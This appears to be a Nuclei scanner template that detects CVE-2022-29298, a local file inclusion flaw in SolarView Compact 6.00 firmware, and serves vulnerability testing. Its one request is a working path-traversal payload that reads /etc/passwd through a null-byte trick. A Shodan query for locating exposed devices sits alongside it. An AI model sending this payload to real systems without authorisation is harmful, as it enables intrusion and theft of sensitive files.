46 lines
1.6 KiB
YAML
46 lines
1.6 KiB
YAML
id: CVE-2022-29298
|
|
|
|
info:
|
|
name: SolarView Compact 6.00 - Local File Inclusion
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
|
|
remediation: |
|
|
Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50950
|
|
- https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
|
|
- https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29298
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-29298
|
|
cwe-id: CWE-22
|
|
epss-score: 0.15611
|
|
epss-percentile: 0.9535
|
|
cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: contec
|
|
product: sv-cpt-mc310_firmware
|
|
shodan-query: http.html:"SolarView Compact"
|
|
tags: lfi,solarview,edb,cve,cve2022
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220793e48f7c0d0393a70c0506e3d36504ef7a998abe069d18a0fdb3720c3c2a5d702204d42ef28059fd0ec477248adc3e1e855917932d40049d9c94354c72c500a02f9:922c64590222798bb761d5b6d8e72950 |